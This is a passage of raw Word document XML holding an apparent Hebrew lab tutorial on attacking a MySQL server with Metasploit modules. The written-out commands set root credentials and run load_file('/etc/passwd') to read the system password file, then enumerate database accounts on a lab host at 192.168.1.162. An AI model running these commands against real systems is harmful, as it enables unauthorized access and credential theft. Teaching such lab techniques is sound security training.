      </w:r>
    </w:p>
    <w:p w14:paraId="2AF44AAA" w14:textId="2E41A7E9" w:rsidR="007B3A24" w:rsidRPr="007D51BF" w:rsidRDefault="007B3A24" w:rsidP="007B3A24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בעזרת המודול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mysql_sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08028095" w14:textId="0D569553" w:rsidR="003B3972" w:rsidRPr="007D51BF" w:rsidRDefault="007B3A24" w:rsidP="003B3972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נחזור לחיפוש </w:t>
      </w:r>
      <w:r w:rsidR="003B3972" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ונבחר במודול 24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB02172" w14:textId="48273702" w:rsidR="002852AE" w:rsidRPr="007D51BF" w:rsidRDefault="003B3972" w:rsidP="002852AE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t>Auxiliray/admin/mysql/mysql_sql</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">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use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D4FB82" w14:textId="5DAFD746" w:rsidR="003B3972" w:rsidRPr="007D51BF" w:rsidRDefault="003B3972" w:rsidP="007B3A24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54149633" wp14:editId="3DE2923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644640" cy="2766060"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:wrapNone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59D61" w14:textId="148F441B" w:rsidR="003B3972" w:rsidRPr="007D51BF" w:rsidRDefault="003B3972" w:rsidP="007B3A24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="740E2184" w14:textId="77777777" w:rsidR="003B3972" w:rsidRPr="007D51BF" w:rsidRDefault="003B3972" w:rsidP="007B3A24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BC51374" w14:textId="01C2D39C" w:rsidR="003B3972" w:rsidRPr="007D51BF" w:rsidRDefault="003B3972" w:rsidP="007B3A24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="509530BF" w14:textId="77777777" w:rsidR="003B3972" w:rsidRPr="007D51BF" w:rsidRDefault="003B3972" w:rsidP="007B3A24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E441E7C" w14:textId="6FDAC082" w:rsidR="003B3972" w:rsidRPr="007D51BF" w:rsidRDefault="003B3972" w:rsidP="007B3A24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53B40A6A" w14:textId="77777777" w:rsidR="003B3972" w:rsidRPr="007D51BF" w:rsidRDefault="003B3972" w:rsidP="007B3A24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5435B6B9" w14:textId="77777777" w:rsidR="003B3972" w:rsidRPr="007D51BF" w:rsidRDefault="003B3972" w:rsidP="007B3A24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11E7FFD7" w14:textId="77777777" w:rsidR="003B3972" w:rsidRPr="007D51BF" w:rsidRDefault="003B3972" w:rsidP="007B3A24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42973929" w14:textId="380F1BA5" w:rsidR="003B3972" w:rsidRPr="007D51BF" w:rsidRDefault="003B3972" w:rsidP="007B3A24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="694D40FA" w14:textId="77777777" w:rsidR="002852AE" w:rsidRPr="007D51BF" w:rsidRDefault="002852AE" w:rsidP="007B3A24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B7F0631" w14:textId="77777777" w:rsidR="002852AE" w:rsidRPr="007D51BF" w:rsidRDefault="002852AE" w:rsidP="007B3A24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D64691F" w14:textId="1C911E39" w:rsidR="002852AE" w:rsidRPr="007D51BF" w:rsidRDefault="002852AE" w:rsidP="002852AE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ונציג את ההגדרות עם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show options</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF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927D4FD" wp14:editId="3E3A147F">
            <wp:extent cx="6637020" cy="1348740"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810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271C" w14:textId="77777777" w:rsidR="002852AE" w:rsidRPr="007D51BF" w:rsidRDefault="002852AE" w:rsidP="002852AE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F025AE3" w14:textId="320BBC48" w:rsidR="003B3972" w:rsidRPr="007D51BF" w:rsidRDefault="002852AE" w:rsidP="007B3A24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lastRenderedPageBreak/>
        <w:t>יש לשים לב למספר דברים</w:t>
      </w:r>
      <w:r w:rsidR="000552B9" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>. א</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>נחנו כבר יודעים את שם המשתמש והסיסמא מהשלב הקודם</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0742DCAB" w14:textId="13761741" w:rsidR="000552B9" w:rsidRPr="007D51BF" w:rsidRDefault="000552B9" w:rsidP="007B3A24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ונצטרך לתת את הנתיב של קובץ </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A61290C" w14:textId="5FD4F500" w:rsidR="000552B9" w:rsidRPr="007D51BF" w:rsidRDefault="000552B9" w:rsidP="002852AE">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl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t>Set RHOSTS 192.168.1.162</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C7EC60" w14:textId="2A0D83FA" w:rsidR="000552B9" w:rsidRPr="007D51BF" w:rsidRDefault="000552B9" w:rsidP="002852AE">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"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t>Set USERNAME root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638CDA2C" w14:textId="6CB044F6" w:rsidR="000552B9" w:rsidRPr="007D51BF" w:rsidRDefault="000552B9" w:rsidP="002852AE">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"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t>Set SQL select load_file(\'/etc/passwd\')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41527F83" w14:textId="338F765E" w:rsidR="000552B9" w:rsidRPr="007D51BF" w:rsidRDefault="000552B9" w:rsidP="002852AE">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"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t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620419BC" w14:textId="3472128D" w:rsidR="000552B9" w:rsidRPr="007D51BF" w:rsidRDefault="000552B9" w:rsidP="002852AE">
      <w:pPr>
        <w:jc w:val="right"/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379FC12B" wp14:editId="173E84F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059680" cy="5783580"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:wrapNone/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E6A4F" w14:textId="5F7C08FF" w:rsidR="000552B9" w:rsidRPr="007D51BF" w:rsidRDefault="000552B9" w:rsidP="002852AE">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="029D2C57" w14:textId="7ADE9D9B" w:rsidR="000552B9" w:rsidRPr="007D51BF" w:rsidRDefault="000552B9" w:rsidP="002852AE">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E756229" w14:textId="36CA3C96" w:rsidR="000552B9" w:rsidRPr="007D51BF" w:rsidRDefault="000552B9" w:rsidP="002852AE">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02CBC70B" w14:textId="1C487A7D" w:rsidR="000552B9" w:rsidRPr="007D51BF" w:rsidRDefault="000552B9" w:rsidP="002852AE">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E6CBC83" w14:textId="430701B3" w:rsidR="000552B9" w:rsidRPr="007D51BF" w:rsidRDefault="000552B9" w:rsidP="002852AE">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="429A63B3" w14:textId="4BF3560D" w:rsidR="000552B9" w:rsidRPr="007D51BF" w:rsidRDefault="000552B9" w:rsidP="002852AE">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E0CBD39" w14:textId="573C33CF" w:rsidR="000552B9" w:rsidRPr="007D51BF" w:rsidRDefault="000552B9" w:rsidP="002852AE">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08305626" w14:textId="77777777" w:rsidR="000552B9" w:rsidRPr="007D51BF" w:rsidRDefault="000552B9" w:rsidP="002852AE">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74DC5FD0" w14:textId="7B184845" w:rsidR="000552B9" w:rsidRPr="007D51BF" w:rsidRDefault="000552B9" w:rsidP="002852AE">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DE3B9D0" w14:textId="77777777" w:rsidR="000552B9" w:rsidRPr="007D51BF" w:rsidRDefault="000552B9" w:rsidP="002852AE">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="620569E8" w14:textId="2F2542A3" w:rsidR="000552B9" w:rsidRPr="007D51BF" w:rsidRDefault="000552B9" w:rsidP="002852AE">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AAA1602" w14:textId="77777777" w:rsidR="000552B9" w:rsidRPr="007D51BF" w:rsidRDefault="000552B9" w:rsidP="002852AE">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F0038B9" w14:textId="433736FD" w:rsidR="000552B9" w:rsidRPr="007D51BF" w:rsidRDefault="000552B9" w:rsidP="002852AE">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F5FB666" w14:textId="27EF389F" w:rsidR="000552B9" w:rsidRPr="007D51BF" w:rsidRDefault="000552B9" w:rsidP="002852AE">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4276B6B9" w14:textId="77777777" w:rsidR="000552B9" w:rsidRPr="007D51BF" w:rsidRDefault="000552B9" w:rsidP="002852AE">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C8FC6C4" w14:textId="77777777" w:rsidR="000552B9" w:rsidRPr="007D51BF" w:rsidRDefault="000552B9" w:rsidP="002852AE">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3766D85A" w14:textId="5480A89D" w:rsidR="000552B9" w:rsidRPr="007D51BF" w:rsidRDefault="000552B9" w:rsidP="002852AE">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66D16C8B" w14:textId="234646A8" w:rsidR="000552B9" w:rsidRPr="007D51BF" w:rsidRDefault="000552B9" w:rsidP="002852AE">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A115ACB" w14:textId="66D50DB0" w:rsidR="000552B9" w:rsidRPr="007D51BF" w:rsidRDefault="000552B9" w:rsidP="000552B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="167B0104" w14:textId="07E2B566" w:rsidR="000552B9" w:rsidRPr="007D51BF" w:rsidRDefault="000552B9" w:rsidP="002852AE">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42226C46" w14:textId="40B368E1" w:rsidR="000552B9" w:rsidRPr="007D51BF" w:rsidRDefault="000552B9" w:rsidP="000552B9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והנה כל שמות המשתמשים והסיסמאות של המערכות.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCB5262" w14:textId="3C2460DA" w:rsidR="000552B9" w:rsidRPr="007D51BF" w:rsidRDefault="000552B9" w:rsidP="000552B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B2F8BCB" w14:textId="77777777" w:rsidR="000552B9" w:rsidRPr="007D51BF" w:rsidRDefault="000552B9" w:rsidP="000552B9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עכשיו ננסה להשיג את כל החשבונות במערכת </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mysql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ואת ההרשאות השונות בינהם.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7C41ED" w14:textId="77777777" w:rsidR="000552B9" w:rsidRPr="007D51BF" w:rsidRDefault="000552B9" w:rsidP="000552B9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בחלק הזה נעבוד עם המודול </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA47092" w14:textId="5C27D61A" w:rsidR="000552B9" w:rsidRPr="007D51BF" w:rsidRDefault="000552B9" w:rsidP="000552B9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use auxiliary/admin/mysql/mysql_enum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4D7B8F" w14:textId="6293AD81" w:rsidR="00C04EBA" w:rsidRPr="007D51BF" w:rsidRDefault="00C04EBA" w:rsidP="00C04EBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"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ונעתיק את נתיב לשורת הפקודה ולאחר מכן נציג את האפשרויות עם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show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6356E92A" w14:textId="13DF76F6" w:rsidR="000552B9" w:rsidRPr="007D51BF" w:rsidRDefault="000552B9" w:rsidP="000552B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EE3865E" w14:textId="12AC4C93" w:rsidR="00C04EBA" w:rsidRPr="007D51BF" w:rsidRDefault="00C04EBA" w:rsidP="000552B9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lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251734016" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7BA65E7B" wp14:editId="24506BEF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>38100</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6644640" cy="1668780"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:wrapNone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4AD7D" w14:textId="07C35410" w:rsidR="00C04EBA" w:rsidRPr="007D51BF" w:rsidRDefault="00C04EBA" w:rsidP="000552B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DA7DE5A" w14:textId="7C09D9B0" w:rsidR="00C04EBA" w:rsidRPr="007D51BF" w:rsidRDefault="00C04EBA" w:rsidP="000552B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20F14195" w14:textId="5A96E1DC" w:rsidR="00C04EBA" w:rsidRPr="007D51BF" w:rsidRDefault="00C04EBA" w:rsidP="000552B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22FA63DD" w14:textId="4E05F941" w:rsidR="00C04EBA" w:rsidRPr="007D51BF" w:rsidRDefault="00C04EBA" w:rsidP="000552B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42231520" w14:textId="77777777" w:rsidR="00C04EBA" w:rsidRPr="007D51BF" w:rsidRDefault="00C04EBA" w:rsidP="000552B9">
      <w:pPr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137591C6" w14:textId="273010A0" w:rsidR="000552B9" w:rsidRPr="007D51BF" w:rsidRDefault="00C04EBA" w:rsidP="00C04EBA">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"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t>set RHOSTS 192.168.1.162</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FA7F3F" w14:textId="1007107D" w:rsidR="00C04EBA" w:rsidRPr="007D51BF" w:rsidRDefault="00C04EBA" w:rsidP="00C04EBA">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"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t>set USERNAME root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A10469A" w14:textId="7FC20BEA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t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52501CB9" w14:textId="24DE06D4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12345D21" wp14:editId="74B8B13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798820" cy="6469380"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:wrapNone/>
            <wp:docPr id="5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7F8C2" w14:textId="6C730EF3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</w:p>
    <w:p w14:paraId="1511723F" w14:textId="4B1C2836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</w:p>
    <w:p w14:paraId="123F6A06" w14:textId="25D329D2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</w:p>
    <w:p w14:paraId="30F81543" w14:textId="3854791E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</w:p>
    <w:p w14:paraId="1BB73C35" w14:textId="5F8D7B98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</w:p>
    <w:p w14:paraId="51CB54DA" w14:textId="008318D9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</w:p>
    <w:p w14:paraId="405CF4A7" w14:textId="492290DF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</w:p>
    <w:p w14:paraId="4E1C9706" w14:textId="39DA9D1E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</w:p>
    <w:p w14:paraId="12CA5CDF" w14:textId="785989BC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</w:p>
    <w:p w14:paraId="1E05F061" w14:textId="64E36F1C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</w:p>
    <w:p w14:paraId="042A7605" w14:textId="6BFE400E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</w:p>
    <w:p w14:paraId="13EC59AA" w14:textId="6D389CE8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</w:p>
    <w:p w14:paraId="2FE85B6E" w14:textId="00085B37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</w:p>
    <w:p w14:paraId="5B9FEEB2" w14:textId="219518D4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</w:p>
    <w:p w14:paraId="6FE64F49" w14:textId="717C8E4A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</w:p>
    <w:p w14:paraId="526BA6F1" w14:textId="06F04159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</w:p>
    <w:p w14:paraId="4A07A5FC" w14:textId="2277864C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</w:p>
    <w:p w14:paraId="5E67CB9A" w14:textId="4EFAC369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</w:p>
    <w:p w14:paraId="052785A4" w14:textId="583E86AB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</w:p>
    <w:p w14:paraId="71C140C2" w14:textId="1DDE4F3C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</w:p>
    <w:p w14:paraId="749274E7" w14:textId="319BC664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</w:p>
    <w:p w14:paraId="4016C990" w14:textId="453F6DFB" w:rsidR="00C04EBA" w:rsidRPr="007D51BF" w:rsidRDefault="00C04EBA" w:rsidP="00C04EBA">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17681E3B" w14:textId="77777777" w:rsidR="006E4532" w:rsidRPr="007D51BF" w:rsidRDefault="006E4532" w:rsidP="00C04EBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4880A87E" w14:textId="77777777" w:rsidR="006E4532" w:rsidRPr="007D51BF" w:rsidRDefault="006E4532" w:rsidP="00C04EBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
